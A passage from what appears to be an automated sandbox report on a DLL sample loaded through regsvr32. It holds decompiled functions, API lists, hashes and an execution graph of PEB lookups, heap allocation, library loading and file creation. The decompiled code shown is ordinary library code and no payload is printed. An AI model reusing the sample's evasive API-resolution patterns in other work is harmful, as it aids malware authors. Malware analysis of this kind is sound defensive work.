				_t19 = GetProcAddress(E1000BE70( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
				_t25 = 0x40000;
				if(_t19 != 0) {
					E1003BB70(__edi,  &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t19() >= 0) {
						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1006d320 = _t25;
				return _t25;
			}














                                                                                                                0x10027b8e
                                                                                                                0x10027b96
                                                                                                                0x10027b99
                                                                                                                0x10027bfc
                                                                                                                0x10027bfc
                                                                                                                0x10027b9b
                                                                                                                0x10027b9c
                                                                                                                0x10027bb8
                                                                                                                0x10027bbc
                                                                                                                0x10027bc1
                                                                                                                0x10027bcb
                                                                                                                0x10027bd6
                                                                                                                0x10027bd7
                                                                                                                0x10027be2
                                                                                                                0x10027bef
                                                                                                                0x10027bef
                                                                                                                0x10027be2
                                                                                                                0x10027bf1
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000BE70: GetModuleHandleA.KERNEL32(?,?,100265FD,ImageList_Create,?,10026657,1000D1D5,?,00000020,10066D68,00000018,100267C1,?,?,?,00000001), ref: 1000BE7D
                                                                                                                  • Part of subcall function 1000BE70: LoadLibraryA.KERNEL32(?), ref: 1000BE8E
                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 10027BB2
                                                                                                                • _memset.LIBCMT ref: 10027BCB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc_memset
                                                                                                                • String ID: DllGetVersion
                                                                                                                • API String ID: 3385804498-2861820592
                                                                                                                • Opcode ID: b584492866188cf12fed214cfa5bd3cad4fb13024c55ee1a61c8ac392899d371
                                                                                                                • Instruction ID: bd8af340e131aae091ceb15de97631d9913520cd9f175e2180474c66d757a1a4
                                                                                                                • Opcode Fuzzy Hash: b584492866188cf12fed214cfa5bd3cad4fb13024c55ee1a61c8ac392899d371
                                                                                                                • Instruction Fuzzy Hash: 72F0A4B1E0022A9AE701DBECDC81B9A73E8EB04754F400521FA14F3291DB70DE0487B6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D888 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E1002D888(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t18 = __ebx;
				_t7 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t7 ^ _t26;
				_t25 = _a4;
				if(_t25 != 0) {
					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameA(_t25,  &_v20, 0xa);
						_t16 = E10018830( &_v20, "combobox");
						asm("sbb eax, eax");
						_t11 =  ~_t16 + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E1003B437(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                0x1002d888
                                                                                                                0x1002d888
                                                                                                                0x1002d888
                                                                                                                0x1002d88e
                                                                                                                0x1002d895
                                                                                                                0x1002d899
                                                                                                                0x1002d89e
                                                                                                                0x1002d8b3
                                                                                                                0x00000000
                                                                                                                0x1002d8b5
                                                                                                                0x1002d8bc
                                                                                                                0x1002d8cb
                                                                                                                0x1002d8d3
                                                                                                                0x1002d8d6
                                                                                                                0x1002d8d6
                                                                                                                0x1002d8a0
                                                                                                                0x1002d8a0
                                                                                                                0x1002d8a0
                                                                                                                0x1002d8a0
                                                                                                                0x1002d8e3

                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002D8A7
                                                                                                                • GetClassNameA.USER32(00000000,?,0000000A), ref: 1002D8BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassLongNameWindow
                                                                                                                • String ID: combobox
                                                                                                                • API String ID: 1147815241-2240613097
                                                                                                                • Opcode ID: 4ad676761bfc85e6bf4b4234fafdf335c023de8cc5c4a1ec01549eb430130d93
                                                                                                                • Instruction ID: c9804d79dcf8906136f819aac079050c85216bae34d98169415d09aa786a25c0
                                                                                                                • Opcode Fuzzy Hash: 4ad676761bfc85e6bf4b4234fafdf335c023de8cc5c4a1ec01549eb430130d93
                                                                                                                • Instruction Fuzzy Hash: 24F0B431910129AFDB01FBA4DC41DBE73E8EF09610B90052AF911E71C0DE34FA048B95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D5AE Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E1002D5AE(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t39 =  &(_t47[7]);
					EnterCriticalSection(_t39);
					E1002D261( &(_t47[5]), _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t50 + 0xc);
						if( *(_t31 + _t38 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}











                                                                                                                0x1002d5b1
                                                                                                                0x1002d5b6
                                                                                                                0x1002d5b9
                                                                                                                0x1002d5be
                                                                                                                0x1002d5c0
                                                                                                                0x1002d5c3
                                                                                                                0x1002d607
                                                                                                                0x1002d607
                                                                                                                0x1002d60b
                                                                                                                0x1002d615
                                                                                                                0x1002d61b
                                                                                                                0x1002d624
                                                                                                                0x1002d630
                                                                                                                0x1002d636
                                                                                                                0x1002d63c
                                                                                                                0x1002d640
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002d5c5
                                                                                                                0x1002d5c5
                                                                                                                0x1002d5c5
                                                                                                                0x1002d5ca
                                                                                                                0x1002d5e7
                                                                                                                0x1002d5ec
                                                                                                                0x1002d5f2
                                                                                                                0x1002d5f2
                                                                                                                0x1002d5f4
                                                                                                                0x1002d5f7
                                                                                                                0x1002d5d5
                                                                                                                0x1002d5d5
                                                                                                                0x1002d5dc
                                                                                                                0x1002d5de
                                                                                                                0x1002d5de
                                                                                                                0x1002d5dc
                                                                                                                0x1002d5fb
                                                                                                                0x1002d5fc
                                                                                                                0x1002d605
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 1002D60B
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 1002D61B
                                                                                                                • LocalFree.KERNEL32(?), ref: 1002D624
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 1002D636
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949335588-0
                                                                                                                • Opcode ID: e6ac7781fc78b7d41e4b3f6506ced5b212b4d593b15d6e9cb0be83b532d52fd1
                                                                                                                • Instruction ID: e1ab424febfb42e6473ade3679e1394c09c05e909e094727f707cb237c5c0029
                                                                                                                • Opcode Fuzzy Hash: e6ac7781fc78b7d41e4b3f6506ced5b212b4d593b15d6e9cb0be83b532d52fd1
                                                                                                                • Instruction Fuzzy Hash: 38114971600A15EFD710EF54E8C4B99B7B8FF09359F50802AE5568B5A1CBB1FD80CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D9C0 Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1002D9C0(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1001729E(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x10070d00 == 0) {
					_t4 = E1002D99C();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x10070eb8 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x10070ea0);
					if( *_t15 == 0) {
						_t4 = 0x10070d08 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x10070ea0);
				}
				EnterCriticalSection(0x10070d08 + _t11 * 0x18);
				return _t4;
			}











                                                                                                                0x1002d9c0
                                                                                                                0x1002d9c0
                                                                                                                0x1002d9c0
                                                                                                                0x1002d9c1
                                                                                                                0x1002d9c5
                                                                                                                0x1002d9c8
                                                                                                                0x1002d9ca
                                                                                                                0x1002d9ca
                                                                                                                0x1002d9d6
                                                                                                                0x1002d9d8
                                                                                                                0x1002d9d8
                                                                                                                0x1002d9dd
                                                                                                                0x1002d9e4
                                                                                                                0x1002d9e5
                                                                                                                0x1002d9e6
                                                                                                                0x1002d9f5
                                                                                                                0x1002d9fc
                                                                                                                0x1002da01
                                                                                                                0x1002da08
                                                                                                                0x1002da0b
                                                                                                                0x1002da11
                                                                                                                0x1002da11
                                                                                                                0x1002da18
                                                                                                                0x1002da18
                                                                                                                0x1002da24
                                                                                                                0x1002da2a

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(10070EA0,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D9FC
                                                                                                                • InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA0B
                                                                                                                • LeaveCriticalSection.KERNEL32(10070EA0,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA18
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA24
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2895727460-0
                                                                                                                • Opcode ID: 53b785d5ee71a24d62151251ee7496b5fde74aea0dc84a825a38766a96a4fda3
                                                                                                                • Instruction ID: bdad85f7b5235e5c437b9f7bdcf5b334b90f7a9d130787cc52641b1b32bf6e1f
                                                                                                                • Opcode Fuzzy Hash: 53b785d5ee71a24d62151251ee7496b5fde74aea0dc84a825a38766a96a4fda3
                                                                                                                • Instruction Fuzzy Hash: A4F0F073600215DBE340EF58EC84B59BBAAEB86354F92461BF18493012CB39ACC0C665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D154 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002D154(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x10070ce8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}







                                                                                                                0x1002d156
                                                                                                                0x1002d159
                                                                                                                0x1002d159
                                                                                                                0x1002d15d
                                                                                                                0x1002d163
                                                                                                                0x1002d169
                                                                                                                0x1002d192
                                                                                                                0x1002d193
                                                                                                                0x00000000
                                                                                                                0x1002d199
                                                                                                                0x1002d16b
                                                                                                                0x1002d16e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002d172
                                                                                                                0x1002d17a
                                                                                                                0x00000000
                                                                                                                0x1002d181
                                                                                                                0x1002d188
                                                                                                                0x00000000
                                                                                                                0x1002d18e

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(10070CE8,?,?,00000000,1002D703,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D15D
                                                                                                                • TlsGetValue.KERNEL32 ref: 1002D172
                                                                                                                • LeaveCriticalSection.KERNEL32(10070CE8,?,?,00000000,1002D703,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D188
                                                                                                                • LeaveCriticalSection.KERNEL32(10070CE8,?,?,00000000,1002D703,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D193
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Leave$EnterValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969253408-0
                                                                                                                • Opcode ID: ece859cae3d465ca1061230bf02a92b2eea1f2dc198a874cb04840c10f12a575
                                                                                                                • Instruction ID: 8a0f3dcb096a9b06504c92c56ecc0be11d67302843099253181646179d08d629
                                                                                                                • Opcode Fuzzy Hash: ece859cae3d465ca1061230bf02a92b2eea1f2dc198a874cb04840c10f12a575
                                                                                                                • Instruction Fuzzy Hash: 1FF01276200611AFE314DF64ECA884AB3AAFF8836139AC866E45593512D730FC158B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1039
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 5007 234313 5017 23484a 5007->5017 5009 23303a 2 API calls 5009->5017 5010 234a79 5012 2402d8 2 API calls 5010->5012 5011 2417d2 GetPEB 5011->5017 5014 234a77 5012->5014 5013 250575 GetPEB 5013->5017 5017->5009 5017->5010 5017->5011 5017->5013 5017->5014 5018 24a50a 2 API calls 5017->5018 5019 232263 GetPEB 5017->5019 5020 24eb61 5017->5020 5024 23bee4 5017->5024 5028 24487b 5017->5028 5018->5017 5019->5017 5021 24eb8f 5020->5021 5022 237f78 GetPEB 5021->5022 5023 24ec19 5022->5023 5023->5017 5025 23befd 5024->5025 5026 237f78 GetPEB 5025->5026 5027 23bf7c 5026->5027 5027->5017 5029 24488b 5028->5029 5030 237f78 GetPEB 5029->5030 5031 244902 5030->5031 5031->5017 5032 24f7f4 5033 24f8f9 5032->5033 5034 24f93e 5033->5034 5035 23e4f5 2 API calls 5033->5035 5036 24f90e 5035->5036 5040 239343 5036->5040 5039 24f94b GetPEB 5039->5034 5041 23935e 5040->5041 5042 2394a2 5041->5042 5044 249635 5041->5044 5042->5039 5045 24964e 5044->5045 5046 237f78 GetPEB 5045->5046 5047 2496c5 5046->5047 5047->5041 3790 2525d1 3795 2350cf 3790->3795 3792 252661 3831 247b25 3792->3831 3794 252675 3826 23638d 3795->3826 3797 236c56 4047 23cde0 3797->4047 3805 2417d2 GetPEB 3805->3826 3808 248ef8 GetPEB RtlAllocateHeap 3808->3826 3817 2434da GetPEB RtlAllocateHeap 3817->3826 3820 236c46 3820->3792 3826->3797 3826->3805 3826->3808 3826->3817 3826->3820 3827 24f94b GetPEB 3826->3827 3834 250e7a 3826->3834 3842 239af8 3826->3842 3846 238844 3826->3846 3856 239c1b 3826->3856 3869 2513a3 3826->3869 3880 2382d2 3826->3880 3890 24416e 3826->3890 3904 248131 3826->3904 3916 24d15e 3826->3916 3925 24fecb 3826->3925 3934 241a83 3826->3934 3937 24eec2 3826->3937 3947 2379cc 3826->3947 3951 248966 3826->3951 3960 250a01 3826->3960 3971 249285 3826->3971 3975 24fad1 3826->3975 3980 23a9cf 3826->3980 3989 2526fc 3826->3989 3994 251fc7 3826->3994 4001 238ee5 3826->4001 4007 24d4ae 3826->4007 4018 23ae33 3826->4018 4022 24604b 3826->4022 4028 2426f3 3826->4028 4031 23e65a 3826->4031 4038 243231 3826->4038 3827->3826 3832 237f78 GetPEB 3831->3832 3833 247b93 ExitProcess 3832->3833 3833->3794 3840 2511a2 3834->3840 3838 2512e6 3838->3826 3840->3838 4061 2491cc 3840->4061 4065 2402d8 3840->4065 4069 24a50a 3840->4069 4073 250575 3840->4073 4077 252545 3840->4077 3843 239b12 3842->3843 3844 251e49 GetPEB RtlAllocateHeap LoadLibraryW 3843->3844 3845 239c05 3843->3845 3844->3843 3845->3826 3848 238b4a 3846->3848 3852 238c94 3848->3852 3855 238c92 3848->3855 4115 233466 3848->4115 4119 236e01 3848->4119 4123 24ed7b 3848->4123 4127 23303a 3848->4127 4132 237761 3848->4132 3854 250575 GetPEB 3852->3854 3854->3855 3855->3826 3862 23a250 3856->3862 3858 24ed7b 2 API calls 3858->3862 3860 236e01 2 API calls 3860->3862 3862->3858 3862->3860 3864 23a4b4 3862->3864 3865 23a4b2 3862->3865 3868 233466 2 API calls 3862->3868 4154 23364e 3862->4154 4165 249862 3862->4165 4169 24f5d9 3862->4169 4173 23d467 3862->4173 4177 24f94b 3862->4177 3866 24ed7b 2 API calls 3864->3866 3865->3826 3866->3865 3868->3862 3878 2517ea 3869->3878 3870 2519e8 3872 2402d8 2 API calls 3870->3872 3871 252545 GetPEB 3871->3878 3873 2519e6 3872->3873 3873->3826 3875 24a50a 2 API calls 3875->3878 3876 24f5d9 2 API calls 3876->3878 3878->3870 3878->3871 3878->3873 3878->3875 3878->3876 3879 24f94b GetPEB 3878->3879 4213 24eab3 3878->4213 4217 248eb3 3878->4217 3879->3878 3883 23855b 3880->3883 3881 24f5d9 2 API calls 3881->3883 3882 238648 4235 238fe9 3882->4235 3883->3881 3883->3882 3885 250575 GetPEB 3883->3885 3886 248eb3 GetPEB 3883->3886 3887 238646 3883->3887 3888 24f94b GetPEB 3883->3888 4221 234b40 3883->4221 3885->3883 3886->3883 3887->3826 3888->3883 3900 24468e 3890->3900 3893 24f5d9 2 API calls 3893->3900 3894 2446c9 3895 2417d2 GetPEB 3894->3895 3898 2446df 3895->3898 3896 244876 3896->3896 3901 2417d2 GetPEB 3898->3901 3899 23303a GetPEB RtlAllocateHeap 3899->3900 3900->3893 3900->3894 3900->3896 3900->3899 3902 24f94b GetPEB 3900->3902 4269 23d2c9 3900->4269 4273 239291 3900->4273 4277 242519 3900->4277 3903 2446f2 3901->3903 3902->3900 3903->3826 4281 241919 3904->4281 3906 23cca2 GetPEB 3914 24857d 3906->3914 3907 2485ac 3909 234b40 2 API calls 3907->3909 3908 24f5d9 GetPEB RtlAllocateHeap 3908->3914 3912 2485cb 3909->3912 3910 2486e9 3910->3910 3911 23d467 GetPEB 3911->3914 3912->3826 3913 248eb3 GetPEB 3913->3914 3914->3906 3914->3907 3914->3908 3914->3910 3914->3911 3914->3913 3915 24f94b GetPEB 3914->3915 3915->3914 3918 24d360 3916->3918 3917 236e01 2 API calls 3917->3918 3918->3917 3920 24ed7b 2 API calls 3918->3920 3921 24d3be 3918->3921 3922 238e38 2 API calls 3918->3922 3923 24d3ab 3918->3923 4284 25267c 3918->4284 3920->3918 3921->3826 3922->3918 3924 24ed7b 2 API calls 3923->3924 3924->3921 3933 24fee5 3925->3933 3927 24f5d9 GetPEB RtlAllocateHeap 3927->3933 3929 233466 2 API calls 3929->3933 3930 250568 3930->3826 3931 23d467 GetPEB 3931->3933 3932 24f94b GetPEB 3932->3933 3933->3927 3933->3929 3933->3930 3933->3931 3933->3932 4288 244e54 3933->4288 4298 25224c 3933->4298 3935 23303a 2 API calls 3934->3935 3936 241b14 3935->3936 3936->3826 3946 24ef01 3937->3946 3940 2425cd GetPEB 3940->3946 3942 24f5b4 3942->3826 3943 2417d2 GetPEB 3943->3946 3946->3940 3946->3942 3946->3943 4306 241b29 3946->4306 4318 24e168 3946->4318 4329 24519c 3946->4329 4347 24bd63 3946->4347 4364 242b1f 3946->4364 3948 2379e8 3947->3948 3949 237f78 GetPEB 3948->3949 3950 237a5b 3949->3950 3950->3826 3954 248c0a 3951->3954 3952 24f5d9 2 API calls 3952->3954 3953 248cc1 4525 247098 3953->4525 3954->3952 3954->3953 3956 248eb3 GetPEB 3954->3956 3957 248cbf 3954->3957 3959 24f94b GetPEB 3954->3959 4521 232263 3954->4521 3956->3954 3957->3826 3959->3954 3961 250a22 3960->3961 3964 23303a 2 API calls 3961->3964 3968 250ddc 3961->3968 4549 231a5f 3961->4549 4557 23aebb 3961->4557 4580 23d4bc 3961->4580 4600 246e97 3961->4600 4607 249a0c 3961->4607 4619 23c151 3961->4619 4627 23958a 3961->4627 3964->3961 3968->3826 3974 24952d 3971->3974 3972 23cca2 GetPEB 3972->3974 3973 24960e 3973->3826 3974->3972 3974->3973 3978 24fbc6 3975->3978 3976 24fc88 3976->3826 3978->3976 4740 23d3bf 3978->4740 4744 23c0ba 3978->4744 3984 23ac19 3980->3984 3985 23adad 3984->3985 3988 2417d2 GetPEB 3984->3988 4748 250de9 3984->4748 4752 242657 3984->4752 4756 2322f7 3984->4756 4763 243e11 3984->4763 4766 237c7a 3984->4766 3985->3826 3988->3984 3990 241919 GetPEB 3989->3990 3991 2527a3 3990->3991 4774 24ee14 3991->4774 3995 2521ad 3994->3995 3996 252212 3995->3996 3999 252210 3995->3999 4000 23303a 2 API calls 3995->4000 4778 246d6b 3995->4778 3998 240231 GetPEB 3996->3998 3998->3999 3999->3826 4000->3995 4002 238f94 4001->4002 4003 238f9c 4002->4003 4004 23303a 2 API calls 4002->4004 4006 238fb3 4002->4006 4782 233f5a 4003->4782 4004->4002 4006->3826 4017 24dc82 4007->4017 4009 240184 GetPEB 4009->4017 4010 23d467 GetPEB 4010->4017 4011 24f5d9 GetPEB RtlAllocateHeap 4011->4017 4012 24df19 4012->3826 4014 233466 2 API calls 4014->4017 4015 24f94b GetPEB 4015->4017 4017->4009 4017->4010 4017->4011 4017->4012 4017->4014 4017->4015 4815 233e99 4017->4815 4819 247a67 4017->4819 4823 243cbe 4017->4823 4019 23ae46 4018->4019 4020 237f78 GetPEB 4019->4020 4021 23aeaf 4020->4021 4021->3826 4024 246226 4022->4024 4026 232263 GetPEB 4024->4026 4027 246266 4024->4027 4827 23ca3c 4024->4827 4830 247b9e 4024->4830 4026->4024 4027->3826 4029 2379cc GetPEB 4028->4029 4030 24277c 4029->4030 4030->3826 4036 23e68a 4031->4036 4032 23eb20 4033 234e8f GetPEB 4032->4033 4035 23eb1e 4033->4035 4034 23303a 2 API calls 4034->4036 4035->3826 4036->4032 4036->4034 4036->4035 4037 234e8f GetPEB 4036->4037 4037->4036 4046 24324b 4038->4046 4040 24343d 4042 2417d2 GetPEB 4040->4042 4044 24343b 4042->4044 4043 23303a 2 API calls 4043->4046 4044->3826 4046->4040 4046->4043 4046->4044 4868 24e5ed 4046->4868 4878 248cf2 4046->4878 4882 23bdeb 4046->4882 4059 23d14d 4047->4059 4048 24f5d9 2 API calls 4048->4059 4050 23d27f 4052 232263 GetPEB 4050->4052 4051 248eb3 GetPEB 4051->4059 4053 23d297 4052->4053 4991 2335b1 4053->4991 4055 24f94b GetPEB 4055->4059 4057 23d27d 4057->3820 4058 24d15e 4 API calls 4058->4059 4059->4048 4059->4050 4059->4051 4059->4055 4059->4057 4059->4058 4060 234b40 2 API calls 4059->4060 4975 251a0a 4059->4975 4982 23c4e5 4059->4982 4060->4059 4062 2491ec 4061->4062 4081 237f78 4062->4081 4066 2402ee 4065->4066 4067 237f78 GetPEB 4066->4067 4068 240380 CloseHandle 4067->4068 4068->3840 4070 24a53c 4069->4070 4071 237f78 GetPEB 4070->4071 4072 24a5d0 CreateFileW 4071->4072 4072->3840 4074 25058d 4073->4074 4111 2497b1 4074->4111 4078 252558 4077->4078 4079 237f78 GetPEB 4078->4079 4080 2525c5 4079->4080 4080->3840 4082 238032 4081->4082 4083 238055 4081->4083 4087 23806b 4082->4087 4083->3840 4085 238040 4090 2466c8 4085->4090 4094 2332ac GetPEB 4087->4094 4089 23812d 4089->4085 4092 2466ed 4090->4092 4091 24680d 